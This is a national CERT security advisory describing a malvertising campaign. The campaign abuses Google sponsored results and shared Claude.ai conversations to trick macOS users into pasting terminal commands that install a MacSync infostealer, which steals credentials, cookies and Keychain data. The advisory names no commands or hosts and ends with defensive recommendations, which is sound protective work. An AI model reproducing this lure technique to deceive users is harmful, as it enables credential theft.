Active Malvertising Campaign Abusing Google Ads and Claude.ai to Deliver Mac Infostealer

Scope: macOS Users (Targeting AI Tool Search Traffic)

Severity: High

An active malvertising campaign discovered on May 10, 2026, abuses legitimate Google sponsored search results and publicly shared Claude.ai conversations hosted on the real claude.ai domain, making them indistinguishable from genuine content to trick macOS users searching for "Claude mac download" into pasting terminal commands that silently download and execute a MacSync infostealer variant, harvesting browser credentials, cookies, macOS Keychain contents including SSH keys and saved passwords, and exfiltrating them to attacker-controlled servers. A second variant performs victim profiling first, checking for Russian/CIS keyboard layouts before delivering a polymorphic second-stage payload via osascript, complicating hash-based detection. Organizations should instruct users to navigate directly to claude.ai rather than clicking any sponsored search results, never paste terminal commands sourced from web pages or AI chat sessions, and source the Claude Code CLI exclusively from official Anthropic documentation.

The Uganda National CERT and Coordination Center (CERT.UG/CC) encourages users and administrators to review the recommendations and apply the necessary updates.

First AI-Generated Zero-Day Exploit – 2FA Bypass in Open-Source Web Admin Tool

Recent Advisories

Categories

Contact info

Useful Links

Subscribe to our Mailing List

Active Malvertising Campaign Abusing Google Ads and Claude.ai to Deliver Mac Infostealer

RELATED ADVISORIES

First AI-Generated Zero-Day Exploit – 2FA Bypass in Open-Source Web Admin Tool

Recent Advisories

Categories